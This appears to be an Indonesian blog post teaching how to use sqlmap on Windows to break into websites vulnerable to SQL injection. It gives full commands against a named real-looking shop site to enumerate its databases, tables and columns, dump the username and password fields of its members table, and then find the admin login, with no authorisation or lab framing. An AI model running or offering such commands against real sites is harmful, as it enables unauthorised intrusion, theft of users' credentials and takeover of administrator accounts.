- Tuturial sqlmap secara lengkap di windows,
bagi sobat yang menemukan bug pada website dan ingin scan database website itu anda bisa menggunakan tools SQLMAP di windows
Phyton : download disini
Sqlmap : download disini
setelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln
1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini
Spoiler :
![[Image: 1.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3HdLZcT62c_KKIjZeJ5LeYaQYhps0cFyej9WVa654ih5RalZw-cMExloluqbSI1T5Nab3sYAe1ld7foCz1ybduUahYlHMGRDzHVxVbkAwzu1hZD6uV3UNKTxStZumsaqiFiYZ_qZpKL0_/s400/1.PNG)
5. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R
6. Ketik pada CMD dengan Perintah cd/ lalu ketik lagi perintah cd/sqlmap sehingga tampak seperti gambar berikut ini
Spoiler :
![[Image: 2.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtaRPRhX2v9_oPpx-tINl0QMBtvWWGiKLfQpUeU6OkemnVH0ZwhtylEbGsouDathF-jBvR577VN1E1mTO7PFpFMGl8_gDCLtmH3WXzB9iHkkppfzmdN22QDb3mbz2MSY8nRu6CsnVL7csF/s640/2.PNG)
Contoh : sqlmap.py -uhttp://www.pushingpetals.com/buy.php?id=55 --dbslalu Tekan Enter
Spoiler :
![[Image: 3.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ2-V_yyoVVAQnn8-T97o9bJgxdGgyCRJ4Xq37uUuA_hlxl3A3q1J5r5UQL_Ut-YGtFysjTlLiURWjMzha5dgzY8VOF0T3MnfUSN1QA0kB4uXluKiuBbisdu-9ZCj5iTyAEE1N0-aSmfkq/s1600/3.PNG)
8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya
dengan perintah sqlmap.py -u Url Target - D nama database --tables
contoh : sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tables
Maka hasil nya akan seperti ini
Spoiler :
![[Image: 4.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSQacvbSdZDAFOUAianXeOIvM5jsIXqdny9N3sJXGk4-xSxOhdbugTsn7cBIzZhsIIiQlFw49mq8it7hyphenhyphenqYO0HmpxvANe5P5QgzVcYAAznyrIMmh7pvd1fzoMtcOH3cIbSTufq_yP9CPUt/s1600/4.PNG)
9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut ( cari menurut kalian di table mana terdapat user name dan password admin web nya )
ane coba scan table Members aja
dengan perinta sqlmap.py -u Url Target - D nama_database -T nama_table --columns
contoh : sqlmap.py -uhttp://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columns
lalu tekan enter dan hasil nya seperti ini
Spoiler :
![[Image: 5.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifDQagzcuocABF1Nw3PUkuD9-T3bFkznaaaDKUlTqMKDtVIY1DAT5z6wRviTZehcfCg9JF3672k8y4MbsR9RBMDiLBUxeiHfOQf1rh7OdG6rMekCcIzaVSh7bVPr02yovzOsGSPjmTFnsj/s1600/5.PNG)
10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintahsqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump
contoh :
sqlmap.py -uhttp://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump
lalu tekan enter ,
11. setelah kita tekan enter makan akan munculusername dan password nya seperti gambar berikut
Spoiler :
![[Image: 6.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH5JbCB2mIFfF_5N29QdG6aGjpLQ2y7UTiVsvE-mmaXg79OWX3FUSccOgyfJH_NtAXG5utoS6qui63bctR3_QD8MUJ7XBfj9ojvFDshAKrcw9d9zvr5A4E-mGcUq8CgxgmvdD_yh3auxvS/s1600/6.PNG)
tinggal kita cari login admin nya
sekian dulu tutor dari ane mudah"an bermanfaat ya Gan :D
0 comments:
Post a Comment